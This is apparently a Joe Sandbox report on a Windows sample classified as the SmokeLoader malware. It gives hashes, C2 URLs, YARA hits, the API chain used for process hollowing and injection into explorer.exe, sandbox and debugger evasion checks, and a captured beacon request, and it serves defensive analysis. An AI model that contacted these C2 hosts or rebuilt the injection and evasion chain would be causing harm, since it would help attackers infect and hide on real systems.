Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
4cqJ4Jjd5j.exe

Overview

General Information

Sample Name:4cqJ4Jjd5j.exe
Analysis ID:678224
MD5:c529659ad79b58eb83d1732b6cc88ff5
SHA1:aad399bd653192ec0ecdeac5c1a4cbf43afb19b6
SHA256:269200ba6acb859b712185ebdad2b0000333e42d194e05d12d86eb3590125aed
Tags:ArkeiStealerexe
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Injects a PE file into a foreign processes
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Contains functionality to inject code into remote processes
Deletes itself after installation
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Contains functionality to call native functions
IP address seen in connection with other malware
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • 4cqJ4Jjd5j.exe (PID: 1276 cmdline: "C:\Users\user\Desktop\4cqJ4Jjd5j.exe" MD5: C529659AD79B58EB83D1732B6CC88FF5)
    • 4cqJ4Jjd5j.exe (PID: 5848 cmdline: "C:\Users\user\Desktop\4cqJ4Jjd5j.exe" MD5: C529659AD79B58EB83D1732B6CC88FF5)
      • explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • brgfgda (PID: 5392 cmdline: C:\Users\user\AppData\Roaming\brgfgda MD5: C529659AD79B58EB83D1732B6CC88FF5)
    • brgfgda (PID: 4916 cmdline: C:\Users\user\AppData\Roaming\brgfgda MD5: C529659AD79B58EB83D1732B6CC88FF5)
  • cleanup
{"C2 list": ["http://host-file-host6.com/", "http://host-host-file8.com/"]}
SourceRuleDescriptionAuthorStrings
00000012.00000002.416720371.00000000006C1000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000001.00000002.350531051.0000000000540000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000012.00000002.416678230.0000000000680000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        00000001.00000002.350835390.0000000002431000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          00000005.00000000.331229772.0000000002941000.00000020.80000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            SourceRuleDescriptionAuthorStrings
            18.2.brgfgda.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              18.0.brgfgda.400000.5.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                0.2.4cqJ4Jjd5j.exe.25015a0.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                  16.2.brgfgda.25d15a0.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                    18.0.brgfgda.400000.6.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                      Click to see the 2 entries
                      No Sigma rule has matched
                      No Snort rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 4cqJ4Jjd5j.exeVirustotal: Detection: 39%Perma Link
                      Source: 4cqJ4Jjd5j.exeReversingLabs: Detection: 43%
                      Source: http://host-host-file8.com/URL Reputation: Label: malware
                      Source: host-file-host6.comVirustotal: Detection: 25%Perma Link
                      Source: host-host-file8.comVirustotal: Detection: 21%Perma Link
                      Source: C:\Users\user\AppData\Roaming\brgfgdaVirustotal: Detection: 39%Perma Link
                      Source: C:\Users\user\AppData\Roaming\brgfgdaReversingLabs: Detection: 43%
                      Source: 4cqJ4Jjd5j.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\brgfgdaJoe Sandbox ML: detected
                      Source: 18.0.brgfgda.400000.2.unpackAvira: Label: TR/Patched.Gen
                      Source: 18.0.brgfgda.400000.1.unpackAvira: Label: TR/Patched.Gen
                      Source: 18.0.brgfgda.400000.3.unpackAvira: Label: TR/Patched.Gen
                      Source: 18.0.brgfgda.400000.0.unpackAvira: Label: TR/Patched.Gen
                      Source: 00000001.00000002.350531051.0000000000540000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"C2 list": ["http://host-file-host6.com/", "http://host-host-file8.com/"]}
                      Source: 4cqJ4Jjd5j.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: Binary string: C:\tivupasozeyabu\dosuduf zevumaga\sit.pdb source: 4cqJ4Jjd5j.exe, brgfgda.5.dr
                      Source: Binary string: 'FC:\tivupasozeyabu\dosuduf zevumaga\sit.pdb`ZBT7@ source: 4cqJ4Jjd5j.exe, brgfgda.5.dr

                      Networking

                      barindex
                      Source: C:\Windows\explorer.exeDomain query: host-file-host6.com
                      Source: C:\Windows\explorer.exeDomain query: host-host-file8.com
                      Source: Malware configuration extractorURLs: http://host-file-host6.com/
                      Source: Malware configuration extractorURLs: http://host-host-file8.com/
                      Source: Joe Sandbox ViewASN Name: GOOGLE-AS-APGoogleAsiaPacificPteLtdSG GOOGLE-AS-APGoogleAsiaPacificPteLtdSG
                      Source: Joe Sandbox ViewIP Address: 34.118.39.10 34.118.39.10
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://armtrksuct.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 343Host: host-file-host6.com
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://armtrksuct.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 343Host: host-file-host6.com
                      Source: unknownDNS traffic detected: queries for: host-file-host6.com

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: Yara matchFile source: 18.2.brgfgda.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.0.brgfgda.400000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.4cqJ4Jjd5j.exe.25015a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.brgfgda.25d15a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.0.brgfgda.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.4cqJ4Jjd5j.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.0.brgfgda.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000012.00000002.416720371.00000000006C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.350531051.0000000000540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.416678230.0000000000680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.350835390.0000000002431000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.331229772.0000000002941000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: 4cqJ4Jjd5j.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: C:\Users\user\Desktop\4cqJ4Jjd5j.exeCode function: 1_2_0040180C Sleep,NtTerminateProcess,1_2_0040180C
                      Source: C:\Users\user\Desktop\4cqJ4Jjd5j.exeCode function: 1_2_00401818 Sleep,NtTerminateProcess,1_2_00401818
                      Source: C:\Users\user\Desktop\4cqJ4Jjd5j.exeCode function: 1_2_00401822 Sleep,NtTerminateProcess,1_2_00401822
                      Source: C:\Users\user\Desktop\4cqJ4Jjd5j.exeCode function: 1_2_00401826 Sleep,NtTerminateProcess,1_2_00401826
                      Source: C:\Users\user\Desktop\4cqJ4Jjd5j.exeCode function: 1_2_00401834 Sleep,NtTerminateProcess,1_2_00401834
                      Source: C:\Users\user\AppData\Roaming\brgfgdaCode function: 16_2_025D0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,16_2_025D0110
                      Source: C:\Users\user\AppData\Roaming\brgfgdaCode function: 18_2_0040180C Sleep,NtTerminateProcess,18_2_0040180C
                      Source: C:\Users\user\AppData\Roaming\brgfgdaCode function: 18_2_00401818 Sleep,NtTerminateProcess,18_2_00401818
                      Source: C:\Users\user\AppData\Roaming\brgfgdaCode function: 18_2_00401822 Sleep,NtTerminateProcess,18_2_00401822
                      Source: C:\Users\user\AppData\Roaming\brgfgdaCode function: 18_2_00401826 Sleep,NtTerminateProcess,18_2_00401826
                      Source: C:\Users\user\AppData\Roaming\brgfgdaCode function: 18_2_00401834 Sleep,NtTerminateProcess,18_2_00401834
                      Source: 4cqJ4Jjd5j.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 4cqJ4Jjd5j.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: brgfgda.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: brgfgda.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: 4cqJ4Jjd5j.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: brgfgda.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 4cqJ4Jjd5j.exeVirustotal: Detection: 39%
                      Source: 4cqJ4Jjd5j.exeReversingLabs: Detection: 43%
                      Source: 4cqJ4Jjd5j.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\4cqJ4Jjd5j.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\4cqJ4Jjd5j.exe "C:\Users\user\Desktop\4cqJ4Jjd5j.exe"
                      Source: C:\Users\user\Desktop\4cqJ4Jjd5j.exeProcess created: C:\Users\user\Desktop\4cqJ4Jjd5j.exe "C:\Users\user\Desktop\4cqJ4Jjd5j.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\brgfgda C:\Users\user\AppData\Roaming\brgfgda
                      Source: C:\Users\user\AppData\Roaming\brgfgdaProcess created: C:\Users\user\AppData\Roaming\brgfgda C:\Users\user\AppData\Roaming\brgfgda
                      Source: C:\Users\user\Desktop\4cqJ4Jjd5j.exeProcess created: C:\Users\user\Desktop\4cqJ4Jjd5j.exe "C:\Users\user\Desktop\4cqJ4Jjd5j.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\brgfgdaProcess created: C:\Users\user\AppData\Roaming\brgfgda C:\Users\user\AppData\Roaming\brgfgdaJump to behavior
                      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\brgfgdaJump to behavior
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@6/2@4/1
                      Source: 4cqJ4Jjd5j.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: C:\tivupasozeyabu\dosuduf zevumaga\sit.pdb source: 4cqJ4Jjd5j.exe, brgfgda.5.dr
                      Source: Binary string: 'FC:\tivupasozeyabu\dosuduf zevumaga\sit.pdb`ZBT7@ source: 4cqJ4Jjd5j.exe, brgfgda.5.dr
                      Source: C:\Users\user\Desktop\4cqJ4Jjd5j.exeCode function: 1_2_004011D0 push ebx; iretd 1_2_00401217
                      Source: C:\Users\user\Desktop\4cqJ4Jjd5j.exeCode function: 1_2_004011D7 push ebx; iretd 1_2_00401217
                      Source: C:\Users\user\Desktop\4cqJ4Jjd5j.exeCode function: 1_2_004011EB push ebx; iretd 1_2_00401217
                      Source: C:\Users\user\AppData\Roaming\brgfgdaCode function: 16_2_025D1977 push ebx; iretd 16_2_025D19B7
                      Source: C:\Users\user\AppData\Roaming\brgfgdaCode function: 16_2_025D1970 push ebx; iretd 16_2_025D19B7
                      Source: C:\Users\user\AppData\Roaming\brgfgdaCode function: 16_2_025D198B push ebx; iretd 16_2_025D19B7
                      Source: C:\Users\user\AppData\Roaming\brgfgdaCode function: 18_2_004011D0 push ebx; iretd 18_2_00401217
                      Source: C:\Users\user\AppData\Roaming\brgfgdaCode function: 18_2_004011D7 push ebx; iretd 18_2_00401217
                      Source: C:\Users\user\AppData\Roaming\brgfgdaCode function: 18_2_004011EB push ebx; iretd 18_2_00401217
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.423882781109827
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.423882781109827
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\brgfgdaJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\brgfgdaJump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\4cqj4jjd5j.exeJump to behavior
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\brgfgda:Zone.Identifier read attributes | deleteJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: 4cqJ4Jjd5j.exe, 00000001.00000002.350510765.000000000052B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
                      Source: brgfgda, 00000012.00000002.416874461.000000000070B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKG
                      Source: C:\Users\user\Desktop\4cqJ4Jjd5j.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\Desktop\4cqJ4Jjd5j.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\Desktop\4cqJ4Jjd5j.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\Desktop\4cqJ4Jjd5j.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\Desktop\4cqJ4Jjd5j.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\Desktop\4cqJ4Jjd5j.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Roaming\brgfgdaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Roaming\brgfgdaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Roaming\brgfgdaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Roaming\brgfgdaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Roaming\brgfgdaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Roaming\brgfgdaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Windows\explorer.exe TID: 1248Thread sleep count: 575 > 30Jump to behavior
                      Source: C:\Windows\explorer.exe TID: 576Thread sleep count: 295 > 30Jump to behavior
                      Source: C:\Windows\explorer.exe TID: 3320Thread sleep count: 299 > 30Jump to behavior
                      Source: C:\Windows\explorer.exe TID: 1104Thread sleep count: 447 > 30Jump to behavior
                      Source: C:\Windows\explorer.exe TID: 3652Thread sleep count: 170 > 30Jump to behavior
                      Source: C:\Windows\explorer.exe TID: 4784Thread sleep count: 188 > 30Jump to behavior
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 575Jump to behavior
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 447Jump to behavior
                      Source: C:\Users\user\Desktop\4cqJ4Jjd5j.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\4cqJ4Jjd5j.exeSystem information queried: ModuleInformationJump to behavior
                      Source: explorer.exe, 00000005.00000000.289564983.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                      Source: explorer.exe, 00000005.00000000.310948604.0000000008290000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
                      Source: explorer.exe, 00000005.00000000.341547405.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m&ven_n
                      Source: explorer.exe, 00000005.00000000.300893716.0000000000680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&280b647&
                      Source: explorer.exe, 00000005.00000000.300994707.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000005.00000000.289564983.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA
                      Source: explorer.exe, 00000005.00000000.341547405.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                      Source: explorer.exe, 00000005.00000000.290434815.0000000008290000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 0ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
                      Source: explorer.exe, 00000005.00000000.341547405.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}t]
                      Source: explorer.exe, 00000005.00000000.336870905.00000000062C4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000005.00000000.341547405.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+]e
                      Source: explorer.exe, 00000005.00000000.272613348.0000000004287000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
                      Source: explorer.exe, 00000005.00000000.310469334.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                      Source: explorer.exe, 00000005.00000000.289564983.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                      Source: explorer.exe, 00000005.00000000.341547405.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00l

                      Anti Debugging

                      barindex
                      Source: C:\Users\user\Desktop\4cqJ4Jjd5j.exeSystem information queried: CodeIntegrityInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\brgfgdaSystem information queried: CodeIntegrityInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\brgfgdaCode function: 16_2_025D0042 push dword ptr fs:[00000030h]16_2_025D0042
                      Source: C:\Users\user\Desktop\4cqJ4Jjd5j.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Roaming\brgfgdaProcess queried: DebugPortJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Windows\explorer.exeFile created: brgfgda.5.drJump to dropped file
                      Source: C:\Windows\explorer.exeDomain query: host-file-host6.com
                      Source: C:\Windows\explorer.exeDomain query: host-host-file8.com
                      Source: C:\Users\user\Desktop\4cqJ4Jjd5j.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                      Source: C:\Users\user\Desktop\4cqJ4Jjd5j.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                      Source: C:\Users\user\AppData\Roaming\brgfgdaSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\brgfgdaSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                      Source: C:\Users\user\AppData\Roaming\brgfgdaMemory written: C:\Users\user\AppData\Roaming\brgfgda base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\brgfgdaCode function: 16_2_025D0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,16_2_025D0110
                      Source: C:\Users\user\Desktop\4cqJ4Jjd5j.exeThread created: C:\Windows\explorer.exe EIP: 2941930Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\brgfgdaThread created: unknown EIP: 4A01930Jump to behavior
                      Source: C:\Users\user\Desktop\4cqJ4Jjd5j.exeProcess created: C:\Users\user\Desktop\4cqJ4Jjd5j.exe "C:\Users\user\Desktop\4cqJ4Jjd5j.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\brgfgdaProcess created: C:\Users\user\AppData\Roaming\brgfgda C:\Users\user\AppData\Roaming\brgfgdaJump to behavior
                      Source: explorer.exe, 00000005.00000000.270738430.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.328655879.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.300917824.0000000000688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanEXE^
                      Source: explorer.exe, 00000005.00000000.305717432.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.271036604.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.340946998.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 00000005.00000000.271036604.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.301477974.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.329726697.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 00000005.00000000.271036604.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.301477974.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.329726697.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: explorer.exe, 00000005.00000000.328785751.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.270752696.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.300994707.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd4
